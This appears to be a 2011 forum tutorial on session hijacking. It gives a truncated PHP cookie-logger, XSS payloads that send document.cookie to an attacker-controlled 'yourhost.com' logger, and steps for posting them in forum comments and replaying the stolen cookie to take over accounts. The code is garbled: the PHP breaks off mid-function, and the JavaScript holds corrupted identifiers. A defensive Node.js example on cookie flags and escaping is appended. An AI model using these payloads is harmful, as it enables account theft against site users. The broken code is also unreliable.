Session Hijacking

18/06/2011 09:11

Session Hijacking:

Session hijacking is the exploitation of a valid computer session, that is, stealing cookies from the victim.

Let us go through it below.

What is a cookie?

A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the browser on the client side. It is static and is returned unchanged by the browser each time it connects to the server.

A cookie has an expiry time that is set by the server, and it is deleted automatically when that time is reached.

Cookies are used to maintain user authentication and state during navigation, possibly across multiple visits.

What can we do after stealing cookies?

As you know, websites authenticate users with a cookie, so a stolen cookie can be used to hijack the victim's session. The attacker replaces their own session cookie with the stolen one.

The following is a cookie-stealing script that must be stored on the attacker's host. It receives the cookie data and stores it in a text file.
PHP Code:
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
Now we come to the most difficult part: injecting a bit of JavaScript into the HTML of a page that the victim visits. We must find a place where the JavaScript will be displayed.

Look for sites that contain interactive user comments and forums.

Post the following code that invokes or activates the cookielogger on the host.

Code:
<script language="Java script">
RubicusFrontendIns.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>
You can also trick the victim into clicking a link that activates the JavaScript.
Below is the code that has to be posted.
Code:
<a href="java script:RubicusFrontendIns.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image can also activate the script. For this purpose you can use the code below.

Code:
<a href="java script:RubicusFrontendIns.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>
Now we have the cookie; what do we do with it?

Download the Cookie Editor Mozilla plugin.

Go to the target site -> open Cookie Editor -> change the cookie to the victim's stolen cookie and update the page. That's it! You should now be in the account. Download the Cookie Editor Mozilla plugin from here: https://addons.mozilla.org/en-US/firefox/addon/573
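
Seen from the site owner's side, the steps above depend on two things: user comments being rendered without encoding, and the session cookie being readable through document.cookie, which a cookie marked HttpOnly is not. The following Node.js sketch is an added example, not part of the original post, that checks a Set-Cookie header for the missing attributes and neutralises posted markup and links. The function names and sample values are constructed for illustration.

```javascript
// Added defensive example; function names and sample values are constructed.

// Report hardening attributes missing from one Set-Cookie header value.
function auditSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((p) => p.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? "" : pair.slice(0, eq);
  const seen = new Map();
  for (const a of attrs) {
    const [k, v = ""] = a.split("=");
    seen.set(k.trim().toLowerCase(), v.trim().toLowerCase());
  }
  const missing = [];
  if (!seen.has("httponly")) missing.push("HttpOnly"); // readable via document.cookie
  if (!seen.has("secure")) missing.push("Secure"); // also sent over plain HTTP
  if (!["lax", "strict"].includes(seen.get("samesite"))) missing.push("SameSite");
  return { name, missing };
}

// Encode user-supplied text for an element body or a quoted attribute, so a
// posted <script> block is shown as text instead of being executed.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow only absolute http(s) links in user content; every other scheme,
// including script-scheme URLs, is replaced with "#".
function safeHref(url) {
  const cleaned = String(url).trim();
  return /^https?:\/\//i.test(cleaned) ? escapeHtml(cleaned) : "#";
}

// Constructed sample inputs.
const SAMPLE_HEADERS = [
  "PHPSESSID=abc123; path=/",
  "sid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
];
const SAMPLE_COMMENT = "<script>/* posted by a user */</script>";

for (const h of SAMPLE_HEADERS) {
  const { name, missing } = auditSetCookie(h);
  console.log(name, missing.length ? "missing: " + missing.join(", ") : "ok");
}
console.log(escapeHtml(SAMPLE_COMMENT));
```

The audit treats SameSite=None the same as an absent SameSite attribute, since both let the cookie travel on cross-site requests.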